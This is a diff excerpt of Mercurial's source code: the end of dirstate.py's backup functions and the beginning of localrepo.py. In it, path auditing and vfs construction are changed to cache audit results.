1291 # fast path -- all the values are known to be files, so just return
1292 # that
1292 # that
1293 return list(files)
1293 return list(files)
1294 return [f for f in dmap if match(f)]
1294 return [f for f in dmap if match(f)]
1295
1295
1296 def _actualfilename(self, tr):
1296 def _actualfilename(self, tr):
1297 if tr:
1297 if tr:
1298 return self._pendingfilename
1298 return self._pendingfilename
1299 else:
1299 else:
1300 return self._filename
1300 return self._filename
1301
1301
1302 def savebackup(self, tr, backupname):
1302 def savebackup(self, tr, backupname):
1303 '''Save current dirstate into backup file'''
1303 '''Save current dirstate into backup file'''
1304 filename = self._actualfilename(tr)
1304 filename = self._actualfilename(tr)
1305 assert backupname != filename
1305 assert backupname != filename
1306
1306
1307 # use '_writedirstate' instead of 'write' to write changes certainly,
1307 # use '_writedirstate' instead of 'write' to write changes certainly,
1308 # because the latter omits writing out if transaction is running.
1308 # because the latter omits writing out if transaction is running.
1309 # output file will be used to create backup of dirstate at this point.
1309 # output file will be used to create backup of dirstate at this point.
1310 if self._dirty or not self._opener.exists(filename):
1310 if self._dirty or not self._opener.exists(filename):
1311 self._writedirstate(self._opener(filename, "w", atomictemp=True,
1311 self._writedirstate(self._opener(filename, "w", atomictemp=True,
1312 checkambig=True))
1312 checkambig=True))
1313
1313
1314 if tr:
1314 if tr:
1315 # ensure that subsequent tr.writepending returns True for
1315 # ensure that subsequent tr.writepending returns True for
1316 # changes written out above, even if dirstate is never
1316 # changes written out above, even if dirstate is never
1317 # changed after this
1317 # changed after this
1318 tr.addfilegenerator('dirstate', (self._filename,),
1318 tr.addfilegenerator('dirstate', (self._filename,),
1319 self._writedirstate, location='plain')
1319 self._writedirstate, location='plain')
1320
1320
1321 # ensure that pending file written above is unlinked at
1321 # ensure that pending file written above is unlinked at
1322 # failure, even if tr.writepending isn't invoked until the
1322 # failure, even if tr.writepending isn't invoked until the
1323 # end of this transaction
1323 # end of this transaction
1324 tr.registertmp(filename, location='plain')
1324 tr.registertmp(filename, location='plain')
1325
1325
1326 self._opener.tryunlink(backupname)
1326 self._opener.tryunlink(backupname)
1327 # hardlink backup is okay because _writedirstate is always called
1327 # hardlink backup is okay because _writedirstate is always called
1328 # with an "atomictemp=True" file.
1328 # with an "atomictemp=True" file.
1329 util.copyfile(self._opener.join(filename),
1329 util.copyfile(self._opener.join(filename),
1330 self._opener.join(backupname), hardlink=True)
1330 self._opener.join(backupname), hardlink=True)
1331
1331
1332 def restorebackup(self, tr, backupname):
1332 def restorebackup(self, tr, backupname):
1333 '''Restore dirstate by backup file'''
1333 '''Restore dirstate by backup file'''
1334 # this "invalidate()" prevents "wlock.release()" from writing
1334 # this "invalidate()" prevents "wlock.release()" from writing
1335 # changes of dirstate out after restoring from backup file
1335 # changes of dirstate out after restoring from backup file
1336 self.invalidate()
1336 self.invalidate()
1337 filename = self._actualfilename(tr)
1337 filename = self._actualfilename(tr)
1338 self._opener.rename(backupname, filename, checkambig=True)
1338 self._opener.rename(backupname, filename, checkambig=True)
1339
1339
1340 def clearbackup(self, tr, backupname):
1340 def clearbackup(self, tr, backupname):
1341 '''Clear backup file'''
1341 '''Clear backup file'''
1342 self._opener.unlink(backupname)
1342 self._opener.unlink(backupname)
@@ -1,2264 +1,2265 b''
1 # localrepo.py - read/write repository class for mercurial
1 # localrepo.py - read/write repository class for mercurial
2 #
2 #
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
3 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 #
4 #
5 # This software may be used and distributed according to the terms of the
5 # This software may be used and distributed according to the terms of the
6 # GNU General Public License version 2 or any later version.
6 # GNU General Public License version 2 or any later version.
7
7
8 from __future__ import absolute_import
8 from __future__ import absolute_import
9
9
10 import errno
10 import errno
11 import hashlib
11 import hashlib
12 import inspect
12 import inspect
13 import os
13 import os
14 import random
14 import random
15 import time
15 import time
16 import weakref
16 import weakref
17
17
18 from .i18n import _
18 from .i18n import _
19 from .node import (
19 from .node import (
20 hex,
20 hex,
21 nullid,
21 nullid,
22 short,
22 short,
23 )
23 )
24 from . import (
24 from . import (
25 bookmarks,
25 bookmarks,
26 branchmap,
26 branchmap,
27 bundle2,
27 bundle2,
28 changegroup,
28 changegroup,
29 changelog,
29 changelog,
30 color,
30 color,
31 context,
31 context,
32 dirstate,
32 dirstate,
33 dirstateguard,
33 dirstateguard,
34 encoding,
34 encoding,
35 error,
35 error,
36 exchange,
36 exchange,
37 extensions,
37 extensions,
38 filelog,
38 filelog,
39 hook,
39 hook,
40 lock as lockmod,
40 lock as lockmod,
41 manifest,
41 manifest,
42 match as matchmod,
42 match as matchmod,
43 merge as mergemod,
43 merge as mergemod,
44 mergeutil,
44 mergeutil,
45 namespaces,
45 namespaces,
46 obsolete,
46 obsolete,
47 pathutil,
47 pathutil,
48 peer,
48 peer,
49 phases,
49 phases,
50 pushkey,
50 pushkey,
51 pycompat,
51 pycompat,
52 repoview,
52 repoview,
53 revset,
53 revset,
54 revsetlang,
54 revsetlang,
55 scmutil,
55 scmutil,
56 sparse,
56 sparse,
57 store,
57 store,
58 subrepo,
58 subrepo,
59 tags as tagsmod,
59 tags as tagsmod,
60 transaction,
60 transaction,
61 txnutil,
61 txnutil,
62 util,
62 util,
63 vfs as vfsmod,
63 vfs as vfsmod,
64 )
64 )
65
65
66 release = lockmod.release
66 release = lockmod.release
67 urlerr = util.urlerr
67 urlerr = util.urlerr
68 urlreq = util.urlreq
68 urlreq = util.urlreq
69
69
70 # set of (path, vfs-location) tuples. vfs-location is:
70 # set of (path, vfs-location) tuples. vfs-location is:
71 # - 'plain for vfs relative paths
71 # - 'plain for vfs relative paths
72 # - '' for svfs relative paths
72 # - '' for svfs relative paths
73 _cachedfiles = set()
73 _cachedfiles = set()
74
74
75 class _basefilecache(scmutil.filecache):
75 class _basefilecache(scmutil.filecache):
76 """All filecache usage on repo are done for logic that should be unfiltered
76 """All filecache usage on repo are done for logic that should be unfiltered
77 """
77 """
78 def __get__(self, repo, type=None):
78 def __get__(self, repo, type=None):
79 if repo is None:
79 if repo is None:
80 return self
80 return self
81 return super(_basefilecache, self).__get__(repo.unfiltered(), type)
81 return super(_basefilecache, self).__get__(repo.unfiltered(), type)
82 def __set__(self, repo, value):
82 def __set__(self, repo, value):
83 return super(_basefilecache, self).__set__(repo.unfiltered(), value)
83 return super(_basefilecache, self).__set__(repo.unfiltered(), value)
84 def __delete__(self, repo):
84 def __delete__(self, repo):
85 return super(_basefilecache, self).__delete__(repo.unfiltered())
85 return super(_basefilecache, self).__delete__(repo.unfiltered())
86
86
87 class repofilecache(_basefilecache):
87 class repofilecache(_basefilecache):
88 """filecache for files in .hg but outside of .hg/store"""
88 """filecache for files in .hg but outside of .hg/store"""
89 def __init__(self, *paths):
89 def __init__(self, *paths):
90 super(repofilecache, self).__init__(*paths)
90 super(repofilecache, self).__init__(*paths)
91 for path in paths:
91 for path in paths:
92 _cachedfiles.add((path, 'plain'))
92 _cachedfiles.add((path, 'plain'))
93
93
94 def join(self, obj, fname):
94 def join(self, obj, fname):
95 return obj.vfs.join(fname)
95 return obj.vfs.join(fname)
96
96
97 class storecache(_basefilecache):
97 class storecache(_basefilecache):
98 """filecache for files in the store"""
98 """filecache for files in the store"""
99 def __init__(self, *paths):
99 def __init__(self, *paths):
100 super(storecache, self).__init__(*paths)
100 super(storecache, self).__init__(*paths)
101 for path in paths:
101 for path in paths:
102 _cachedfiles.add((path, ''))
102 _cachedfiles.add((path, ''))
103
103
104 def join(self, obj, fname):
104 def join(self, obj, fname):
105 return obj.sjoin(fname)
105 return obj.sjoin(fname)
106
106
107 def isfilecached(repo, name):
107 def isfilecached(repo, name):
108 """check if a repo has already cached "name" filecache-ed property
108 """check if a repo has already cached "name" filecache-ed property
109
109
110 This returns (cachedobj-or-None, iscached) tuple.
110 This returns (cachedobj-or-None, iscached) tuple.
111 """
111 """
112 cacheentry = repo.unfiltered()._filecache.get(name, None)
112 cacheentry = repo.unfiltered()._filecache.get(name, None)
113 if not cacheentry:
113 if not cacheentry:
114 return None, False
114 return None, False
115 return cacheentry.obj, True
115 return cacheentry.obj, True
116
116
117 class unfilteredpropertycache(util.propertycache):
117 class unfilteredpropertycache(util.propertycache):
118 """propertycache that apply to unfiltered repo only"""
118 """propertycache that apply to unfiltered repo only"""
119
119
120 def __get__(self, repo, type=None):
120 def __get__(self, repo, type=None):
121 unfi = repo.unfiltered()
121 unfi = repo.unfiltered()
122 if unfi is repo:
122 if unfi is repo:
123 return super(unfilteredpropertycache, self).__get__(unfi)
123 return super(unfilteredpropertycache, self).__get__(unfi)
124 return getattr(unfi, self.name)
124 return getattr(unfi, self.name)
125
125
126 class filteredpropertycache(util.propertycache):
126 class filteredpropertycache(util.propertycache):
127 """propertycache that must take filtering in account"""
127 """propertycache that must take filtering in account"""
128
128
129 def cachevalue(self, obj, value):
129 def cachevalue(self, obj, value):
130 object.__setattr__(obj, self.name, value)
130 object.__setattr__(obj, self.name, value)
131
131
132
132
133 def hasunfilteredcache(repo, name):
133 def hasunfilteredcache(repo, name):
134 """check if a repo has an unfilteredpropertycache value for <name>"""
134 """check if a repo has an unfilteredpropertycache value for <name>"""
135 return name in vars(repo.unfiltered())
135 return name in vars(repo.unfiltered())
136
136
137 def unfilteredmethod(orig):
137 def unfilteredmethod(orig):
138 """decorate method that always need to be run on unfiltered version"""
138 """decorate method that always need to be run on unfiltered version"""
139 def wrapper(repo, *args, **kwargs):
139 def wrapper(repo, *args, **kwargs):
140 return orig(repo.unfiltered(), *args, **kwargs)
140 return orig(repo.unfiltered(), *args, **kwargs)
141 return wrapper
141 return wrapper
142
142
143 moderncaps = {'lookup', 'branchmap', 'pushkey', 'known', 'getbundle',
143 moderncaps = {'lookup', 'branchmap', 'pushkey', 'known', 'getbundle',
144 'unbundle'}
144 'unbundle'}
145 legacycaps = moderncaps.union({'changegroupsubset'})
145 legacycaps = moderncaps.union({'changegroupsubset'})
146
146
147 class localpeer(peer.peerrepository):
147 class localpeer(peer.peerrepository):
148 '''peer for a local repo; reflects only the most recent API'''
148 '''peer for a local repo; reflects only the most recent API'''
149
149
150 def __init__(self, repo, caps=None):
150 def __init__(self, repo, caps=None):
151 if caps is None:
151 if caps is None:
152 caps = moderncaps.copy()
152 caps = moderncaps.copy()
153 peer.peerrepository.__init__(self)
153 peer.peerrepository.__init__(self)
154 self._repo = repo.filtered('served')
154 self._repo = repo.filtered('served')
155 self.ui = repo.ui
155 self.ui = repo.ui
156 self._caps = repo._restrictcapabilities(caps)
156 self._caps = repo._restrictcapabilities(caps)
157
157
158 def close(self):
158 def close(self):
159 self._repo.close()
159 self._repo.close()
160
160
161 def _capabilities(self):
161 def _capabilities(self):
162 return self._caps
162 return self._caps
163
163
164 def local(self):
164 def local(self):
165 return self._repo
165 return self._repo
166
166
167 def canpush(self):
167 def canpush(self):
168 return True
168 return True
169
169
170 def url(self):
170 def url(self):
171 return self._repo.url()
171 return self._repo.url()
172
172
173 def lookup(self, key):
173 def lookup(self, key):
174 return self._repo.lookup(key)
174 return self._repo.lookup(key)
175
175
176 def branchmap(self):
176 def branchmap(self):
177 return self._repo.branchmap()
177 return self._repo.branchmap()
178
178
179 def heads(self):
179 def heads(self):
180 return self._repo.heads()
180 return self._repo.heads()
181
181
182 def known(self, nodes):
182 def known(self, nodes):
183 return self._repo.known(nodes)
183 return self._repo.known(nodes)
184
184
185 def getbundle(self, source, heads=None, common=None, bundlecaps=None,
185 def getbundle(self, source, heads=None, common=None, bundlecaps=None,
186 **kwargs):
186 **kwargs):
187 chunks = exchange.getbundlechunks(self._repo, source, heads=heads,
187 chunks = exchange.getbundlechunks(self._repo, source, heads=heads,
188 common=common, bundlecaps=bundlecaps,
188 common=common, bundlecaps=bundlecaps,
189 **kwargs)
189 **kwargs)
190 cb = util.chunkbuffer(chunks)
190 cb = util.chunkbuffer(chunks)
191
191
192 if exchange.bundle2requested(bundlecaps):
192 if exchange.bundle2requested(bundlecaps):
193 # When requesting a bundle2, getbundle returns a stream to make the
193 # When requesting a bundle2, getbundle returns a stream to make the
194 # wire level function happier. We need to build a proper object
194 # wire level function happier. We need to build a proper object
195 # from it in local peer.
195 # from it in local peer.
196 return bundle2.getunbundler(self.ui, cb)
196 return bundle2.getunbundler(self.ui, cb)
197 else:
197 else:
198 return changegroup.getunbundler('01', cb, None)
198 return changegroup.getunbundler('01', cb, None)
199
199
200 # TODO We might want to move the next two calls into legacypeer and add
200 # TODO We might want to move the next two calls into legacypeer and add
201 # unbundle instead.
201 # unbundle instead.
202
202
203 def unbundle(self, cg, heads, url):
203 def unbundle(self, cg, heads, url):
204 """apply a bundle on a repo
204 """apply a bundle on a repo
205
205
206 This function handles the repo locking itself."""
206 This function handles the repo locking itself."""
207 try:
207 try:
208 try:
208 try:
209 cg = exchange.readbundle(self.ui, cg, None)
209 cg = exchange.readbundle(self.ui, cg, None)
210 ret = exchange.unbundle(self._repo, cg, heads, 'push', url)
210 ret = exchange.unbundle(self._repo, cg, heads, 'push', url)
211 if util.safehasattr(ret, 'getchunks'):
211 if util.safehasattr(ret, 'getchunks'):
212 # This is a bundle20 object, turn it into an unbundler.
212 # This is a bundle20 object, turn it into an unbundler.
213 # This little dance should be dropped eventually when the
213 # This little dance should be dropped eventually when the
214 # API is finally improved.
214 # API is finally improved.
215 stream = util.chunkbuffer(ret.getchunks())
215 stream = util.chunkbuffer(ret.getchunks())
216 ret = bundle2.getunbundler(self.ui, stream)
216 ret = bundle2.getunbundler(self.ui, stream)
217 return ret
217 return ret
218 except Exception as exc:
218 except Exception as exc:
219 # If the exception contains output salvaged from a bundle2
219 # If the exception contains output salvaged from a bundle2
220 # reply, we need to make sure it is printed before continuing
220 # reply, we need to make sure it is printed before continuing
221 # to fail. So we build a bundle2 with such output and consume
221 # to fail. So we build a bundle2 with such output and consume
222 # it directly.
222 # it directly.
223 #
223 #
224 # This is not very elegant but allows a "simple" solution for
224 # This is not very elegant but allows a "simple" solution for
225 # issue4594
225 # issue4594
226 output = getattr(exc, '_bundle2salvagedoutput', ())
226 output = getattr(exc, '_bundle2salvagedoutput', ())
227 if output:
227 if output:
228 bundler = bundle2.bundle20(self._repo.ui)
228 bundler = bundle2.bundle20(self._repo.ui)
229 for out in output:
229 for out in output:
230 bundler.addpart(out)
230 bundler.addpart(out)
231 stream = util.chunkbuffer(bundler.getchunks())
231 stream = util.chunkbuffer(bundler.getchunks())
232 b = bundle2.getunbundler(self.ui, stream)
232 b = bundle2.getunbundler(self.ui, stream)
233 bundle2.processbundle(self._repo, b)
233 bundle2.processbundle(self._repo, b)
234 raise
234 raise
235 except error.PushRaced as exc:
235 except error.PushRaced as exc:
236 raise error.ResponseError(_('push failed:'), str(exc))
236 raise error.ResponseError(_('push failed:'), str(exc))
237
237
238 def pushkey(self, namespace, key, old, new):
238 def pushkey(self, namespace, key, old, new):
239 return self._repo.pushkey(namespace, key, old, new)
239 return self._repo.pushkey(namespace, key, old, new)
240
240
241 def listkeys(self, namespace):
241 def listkeys(self, namespace):
242 return self._repo.listkeys(namespace)
242 return self._repo.listkeys(namespace)
243
243
244 def debugwireargs(self, one, two, three=None, four=None, five=None):
244 def debugwireargs(self, one, two, three=None, four=None, five=None):
245 '''used to test argument passing over the wire'''
245 '''used to test argument passing over the wire'''
246 return "%s %s %s %s %s" % (one, two, three, four, five)
246 return "%s %s %s %s %s" % (one, two, three, four, five)
247
247
248 class locallegacypeer(localpeer):
248 class locallegacypeer(localpeer):
249 '''peer extension which implements legacy methods too; used for tests with
249 '''peer extension which implements legacy methods too; used for tests with
250 restricted capabilities'''
250 restricted capabilities'''
251
251
252 def __init__(self, repo):
252 def __init__(self, repo):
253 localpeer.__init__(self, repo, caps=legacycaps)
253 localpeer.__init__(self, repo, caps=legacycaps)
254
254
255 def branches(self, nodes):
255 def branches(self, nodes):
256 return self._repo.branches(nodes)
256 return self._repo.branches(nodes)
257
257
258 def between(self, pairs):
258 def between(self, pairs):
259 return self._repo.between(pairs)
259 return self._repo.between(pairs)
260
260
261 def changegroup(self, basenodes, source):
261 def changegroup(self, basenodes, source):
262 return changegroup.changegroup(self._repo, basenodes, source)
262 return changegroup.changegroup(self._repo, basenodes, source)
263
263
264 def changegroupsubset(self, bases, heads, source):
264 def changegroupsubset(self, bases, heads, source):
265 return changegroup.changegroupsubset(self._repo, bases, heads, source)
265 return changegroup.changegroupsubset(self._repo, bases, heads, source)
266
266
267 # Increment the sub-version when the revlog v2 format changes to lock out old
267 # Increment the sub-version when the revlog v2 format changes to lock out old
268 # clients.
268 # clients.
269 REVLOGV2_REQUIREMENT = 'exp-revlogv2.0'
269 REVLOGV2_REQUIREMENT = 'exp-revlogv2.0'
270
270
271 class localrepository(object):
271 class localrepository(object):
272
272
273 supportedformats = {
273 supportedformats = {
274 'revlogv1',
274 'revlogv1',
275 'generaldelta',
275 'generaldelta',
276 'treemanifest',
276 'treemanifest',
277 'manifestv2',
277 'manifestv2',
278 REVLOGV2_REQUIREMENT,
278 REVLOGV2_REQUIREMENT,
279 }
279 }
280 _basesupported = supportedformats | {
280 _basesupported = supportedformats | {
281 'store',
281 'store',
282 'fncache',
282 'fncache',
283 'shared',
283 'shared',
284 'relshared',
284 'relshared',
285 'dotencode',
285 'dotencode',
286 'exp-sparse',
286 'exp-sparse',
287 }
287 }
288 openerreqs = {
288 openerreqs = {
289 'revlogv1',
289 'revlogv1',
290 'generaldelta',
290 'generaldelta',
291 'treemanifest',
291 'treemanifest',
292 'manifestv2',
292 'manifestv2',
293 }
293 }
294
294
295 # a list of (ui, featureset) functions.
295 # a list of (ui, featureset) functions.
296 # only functions defined in module of enabled extensions are invoked
296 # only functions defined in module of enabled extensions are invoked
297 featuresetupfuncs = set()
297 featuresetupfuncs = set()
298
298
299 # list of prefix for file which can be written without 'wlock'
299 # list of prefix for file which can be written without 'wlock'
300 # Extensions should extend this list when needed
300 # Extensions should extend this list when needed
301 _wlockfreeprefix = {
301 _wlockfreeprefix = {
302 # We migh consider requiring 'wlock' for the next
302 # We migh consider requiring 'wlock' for the next
303 # two, but pretty much all the existing code assume
303 # two, but pretty much all the existing code assume
304 # wlock is not needed so we keep them excluded for
304 # wlock is not needed so we keep them excluded for
305 # now.
305 # now.
306 'hgrc',
306 'hgrc',
307 'requires',
307 'requires',
308 # XXX cache is a complicatged business someone
308 # XXX cache is a complicatged business someone
309 # should investigate this in depth at some point
309 # should investigate this in depth at some point
310 'cache/',
310 'cache/',
311 # XXX shouldn't be dirstate covered by the wlock?
311 # XXX shouldn't be dirstate covered by the wlock?
312 'dirstate',
312 'dirstate',
313 # XXX bisect was still a bit too messy at the time
313 # XXX bisect was still a bit too messy at the time
314 # this changeset was introduced. Someone should fix
314 # this changeset was introduced. Someone should fix
315 # the remainig bit and drop this line
315 # the remainig bit and drop this line
316 'bisect.state',
316 'bisect.state',
317 }
317 }
318
318
319 def __init__(self, baseui, path, create=False):
319 def __init__(self, baseui, path, create=False):
320 self.requirements = set()
320 self.requirements = set()
321 self.filtername = None
321 self.filtername = None
322 # wvfs: rooted at the repository root, used to access the working copy
322 # wvfs: rooted at the repository root, used to access the working copy
323 self.wvfs = vfsmod.vfs(path, expandpath=True, realpath=True)
323 self.wvfs = vfsmod.vfs(path, expandpath=True, realpath=True)
324 # vfs: rooted at .hg, used to access repo files outside of .hg/store
324 # vfs: rooted at .hg, used to access repo files outside of .hg/store
325 self.vfs = None
325 self.vfs = None
326 # svfs: usually rooted at .hg/store, used to access repository history
326 # svfs: usually rooted at .hg/store, used to access repository history
327 # If this is a shared repository, this vfs may point to another
327 # If this is a shared repository, this vfs may point to another
328 # repository's .hg/store directory.
328 # repository's .hg/store directory.
329 self.svfs = None
329 self.svfs = None
330 self.root = self.wvfs.base
330 self.root = self.wvfs.base
331 self.path = self.wvfs.join(".hg")
331 self.path = self.wvfs.join(".hg")
332 self.origroot = path
332 self.origroot = path
333 # These auditor are not used by the vfs,
333 # These auditor are not used by the vfs,
334 # only used when writing this comment: basectx.match
334 # only used when writing this comment: basectx.match
335 self.auditor = pathutil.pathauditor(self.root, self._checknested)
335 self.auditor = pathutil.pathauditor(self.root, self._checknested)
336 self.nofsauditor = pathutil.pathauditor(self.root, self._checknested,
336 self.nofsauditor = pathutil.pathauditor(self.root, self._checknested,
337 realfs=False)
337 realfs=False, cached=True)
338 self.baseui = baseui
338 self.baseui = baseui
339 self.ui = baseui.copy()
339 self.ui = baseui.copy()
340 self.ui.copy = baseui.copy # prevent copying repo configuration
340 self.ui.copy = baseui.copy # prevent copying repo configuration
341 self.vfs = vfsmod.vfs(self.path)
341 self.vfs = vfsmod.vfs(self.path, cacheaudited=True)
342 if (self.ui.configbool('devel', 'all-warnings') or
342 if (self.ui.configbool('devel', 'all-warnings') or
343 self.ui.configbool('devel', 'check-locks')):
343 self.ui.configbool('devel', 'check-locks')):
344 self.vfs.audit = self._getvfsward(self.vfs.audit)
344 self.vfs.audit = self._getvfsward(self.vfs.audit)
345 # A list of callback to shape the phase if no data were found.
345 # A list of callback to shape the phase if no data were found.
346 # Callback are in the form: func(repo, roots) --> processed root.
346 # Callback are in the form: func(repo, roots) --> processed root.
347 # This list it to be filled by extension during repo setup
347 # This list it to be filled by extension during repo setup
348 self._phasedefaults = []
348 self._phasedefaults = []
349 try:
349 try:
350 self.ui.readconfig(self.vfs.join("hgrc"), self.root)
350 self.ui.readconfig(self.vfs.join("hgrc"), self.root)
351 self._loadextensions()
351 self._loadextensions()
352 except IOError:
352 except IOError:
353 pass
353 pass
354
354
355 if self.featuresetupfuncs:
355 if self.featuresetupfuncs:
356 self.supported = set(self._basesupported) # use private copy
356 self.supported = set(self._basesupported) # use private copy
357 extmods = set(m.__name__ for n, m
357 extmods = set(m.__name__ for n, m
358 in extensions.extensions(self.ui))
358 in extensions.extensions(self.ui))
359 for setupfunc in self.featuresetupfuncs:
359 for setupfunc in self.featuresetupfuncs:
360 if setupfunc.__module__ in extmods:
360 if setupfunc.__module__ in extmods:
361 setupfunc(self.ui, self.supported)
361 setupfunc(self.ui, self.supported)
362 else:
362 else:
363 self.supported = self._basesupported
363 self.supported = self._basesupported
364 color.setup(self.ui)
364 color.setup(self.ui)
365
365
366 # Add compression engines.
366 # Add compression engines.
367 for name in util.compengines:
367 for name in util.compengines:
368 engine = util.compengines[name]
368 engine = util.compengines[name]
369 if engine.revlogheader():
369 if engine.revlogheader():
370 self.supported.add('exp-compression-%s' % name)
370 self.supported.add('exp-compression-%s' % name)
371
371
372 if not self.vfs.isdir():
372 if not self.vfs.isdir():
373 if create:
373 if create:
374 self.requirements = newreporequirements(self)
374 self.requirements = newreporequirements(self)
375
375
376 if not self.wvfs.exists():
376 if not self.wvfs.exists():
377 self.wvfs.makedirs()
377 self.wvfs.makedirs()
378 self.vfs.makedir(notindexed=True)
378 self.vfs.makedir(notindexed=True)
379
379
380 if 'store' in self.requirements:
380 if 'store' in self.requirements:
381 self.vfs.mkdir("store")
381 self.vfs.mkdir("store")
382
382
383 # create an invalid changelog
383 # create an invalid changelog
384 self.vfs.append(
384 self.vfs.append(
385 "00changelog.i",
385 "00changelog.i",
386 '\0\0\0\2' # represents revlogv2
386 '\0\0\0\2' # represents revlogv2
387 ' dummy changelog to prevent using the old repo layout'
387 ' dummy changelog to prevent using the old repo layout'
388 )
388 )
389 else:
389 else:
390 raise error.RepoError(_("repository %s not found") % path)
390 raise error.RepoError(_("repository %s not found") % path)
391 elif create:
391 elif create:
392 raise error.RepoError(_("repository %s already exists") % path)
392 raise error.RepoError(_("repository %s already exists") % path)
393 else:
393 else:
394 try:
394 try:
395 self.requirements = scmutil.readrequires(
395 self.requirements = scmutil.readrequires(
396 self.vfs, self.supported)
396 self.vfs, self.supported)
397 except IOError as inst:
397 except IOError as inst:
398 if inst.errno != errno.ENOENT:
398 if inst.errno != errno.ENOENT:
399 raise
399 raise
400
400
401 cachepath = self.vfs.join('cache')
401 cachepath = self.vfs.join('cache')
402 self.sharedpath = self.path
402 self.sharedpath = self.path
403 try:
403 try:
404 sharedpath = self.vfs.read("sharedpath").rstrip('\n')
404 sharedpath = self.vfs.read("sharedpath").rstrip('\n')
405 if 'relshared' in self.requirements:
405 if 'relshared' in self.requirements:
406 sharedpath = self.vfs.join(sharedpath)
406 sharedpath = self.vfs.join(sharedpath)
407 vfs = vfsmod.vfs(sharedpath, realpath=True)
407 vfs = vfsmod.vfs(sharedpath, realpath=True)
408 cachepath = vfs.join('cache')
408 cachepath = vfs.join('cache')
409 s = vfs.base
409 s = vfs.base
410 if not vfs.exists():
410 if not vfs.exists():
411 raise error.RepoError(
411 raise error.RepoError(
412 _('.hg/sharedpath points to nonexistent directory %s') % s)
412 _('.hg/sharedpath points to nonexistent directory %s') % s)
413 self.sharedpath = s
413 self.sharedpath = s
414 except IOError as inst:
414 except IOError as inst:
415 if inst.errno != errno.ENOENT:
415 if inst.errno != errno.ENOENT:
416 raise
416 raise
417
417
418 if 'exp-sparse' in self.requirements and not sparse.enabled:
418 if 'exp-sparse' in self.requirements and not sparse.enabled:
419 raise error.RepoError(_('repository is using sparse feature but '
419 raise error.RepoError(_('repository is using sparse feature but '
420 'sparse is not enabled; enable the '
420 'sparse is not enabled; enable the '
421 '"sparse" extensions to access'))
421 '"sparse" extensions to access'))
422
422
423 self.store = store.store(
423 self.store = store.store(
424 self.requirements, self.sharedpath, vfsmod.vfs)
424 self.requirements, self.sharedpath,
425 lambda base: vfsmod.vfs(base, cacheaudited=True))
425 self.spath = self.store.path
426 self.spath = self.store.path
426 self.svfs = self.store.vfs
427 self.svfs = self.store.vfs
427 self.sjoin = self.store.join
428 self.sjoin = self.store.join
428 self.vfs.createmode = self.store.createmode
429 self.vfs.createmode = self.store.createmode
429 self.cachevfs = vfsmod.vfs(cachepath)
430 self.cachevfs = vfsmod.vfs(cachepath, cacheaudited=True)
430 self.cachevfs.createmode = self.store.createmode
431 self.cachevfs.createmode = self.store.createmode
431 if (self.ui.configbool('devel', 'all-warnings') or
432 if (self.ui.configbool('devel', 'all-warnings') or
432 self.ui.configbool('devel', 'check-locks')):
433 self.ui.configbool('devel', 'check-locks')):
433 if util.safehasattr(self.svfs, 'vfs'): # this is filtervfs
434 if util.safehasattr(self.svfs, 'vfs'): # this is filtervfs
434 self.svfs.vfs.audit = self._getsvfsward(self.svfs.vfs.audit)
435 self.svfs.vfs.audit = self._getsvfsward(self.svfs.vfs.audit)
435 else: # standard vfs
436 else: # standard vfs
436 self.svfs.audit = self._getsvfsward(self.svfs.audit)
437 self.svfs.audit = self._getsvfsward(self.svfs.audit)
437 self._applyopenerreqs()
438 self._applyopenerreqs()
438 if create:
439 if create:
439 self._writerequirements()
440 self._writerequirements()
440
441
441 self._dirstatevalidatewarned = False
442 self._dirstatevalidatewarned = False
442
443
443 self._branchcaches = {}
444 self._branchcaches = {}
444 self._revbranchcache = None
445 self._revbranchcache = None
445 self.filterpats = {}
446 self.filterpats = {}
446 self._datafilters = {}
447 self._datafilters = {}
447 self._transref = self._lockref = self._wlockref = None
448 self._transref = self._lockref = self._wlockref = None
448
449
449 # A cache for various files under .hg/ that tracks file changes,
450 # A cache for various files under .hg/ that tracks file changes,
450 # (used by the filecache decorator)
451 # (used by the filecache decorator)
451 #
452 #
452 # Maps a property name to its util.filecacheentry
453 # Maps a property name to its util.filecacheentry
453 self._filecache = {}
454 self._filecache = {}
454
455
455 # hold sets of revision to be filtered
456 # hold sets of revision to be filtered
456 # should be cleared when something might have changed the filter value:
457 # should be cleared when something might have changed the filter value:
457 # - new changesets,
458 # - new changesets,
458 # - phase change,
459 # - phase change,
459 # - new obsolescence marker,
460 # - new obsolescence marker,
460 # - working directory parent change,
461 # - working directory parent change,
461 # - bookmark changes
462 # - bookmark changes
462 self.filteredrevcache = {}
463 self.filteredrevcache = {}
463
464
464 # post-dirstate-status hooks
465 # post-dirstate-status hooks
465 self._postdsstatus = []
466 self._postdsstatus = []
466
467
467 # Cache of types representing filtered repos.
468 # Cache of types representing filtered repos.
468 self._filteredrepotypes = weakref.WeakKeyDictionary()
469 self._filteredrepotypes = weakref.WeakKeyDictionary()
469
470
470 # generic mapping between names and nodes
471 # generic mapping between names and nodes
471 self.names = namespaces.namespaces()
472 self.names = namespaces.namespaces()
472
473
473 # Key to signature value.
474 # Key to signature value.
474 self._sparsesignaturecache = {}
475 self._sparsesignaturecache = {}
475 # Signature to cached matcher instance.
476 # Signature to cached matcher instance.
476 self._sparsematchercache = {}
477 self._sparsematchercache = {}
477
478
478 def _getvfsward(self, origfunc):
479 def _getvfsward(self, origfunc):
479 """build a ward for self.vfs"""
480 """build a ward for self.vfs"""
480 rref = weakref.ref(self)
481 rref = weakref.ref(self)
481 def checkvfs(path, mode=None):
482 def checkvfs(path, mode=None):
482 ret = origfunc(path, mode=mode)
483 ret = origfunc(path, mode=mode)
483 repo = rref()
484 repo = rref()
484 if (repo is None
485 if (repo is None
485 or not util.safehasattr(repo, '_wlockref')
486 or not util.safehasattr(repo, '_wlockref')
486 or not util.safehasattr(repo, '_lockref')):
487 or not util.safehasattr(repo, '_lockref')):
487 return
488 return
488 if mode in (None, 'r', 'rb'):
489 if mode in (None, 'r', 'rb'):
489 return
490 return
490 if path.startswith(repo.path):
491 if path.startswith(repo.path):
491 # truncate name relative to the repository (.hg)
492 # truncate name relative to the repository (.hg)
492 path = path[len(repo.path) + 1:]
493 path = path[len(repo.path) + 1:]
493 if path.startswith('cache/'):
494 if path.startswith('cache/'):
494 msg = 'accessing cache with vfs instead of cachevfs: "%s"'
495 msg = 'accessing cache with vfs instead of cachevfs: "%s"'
495 repo.ui.develwarn(msg % path, stacklevel=2, config="cache-vfs")
496 repo.ui.develwarn(msg % path, stacklevel=2, config="cache-vfs")
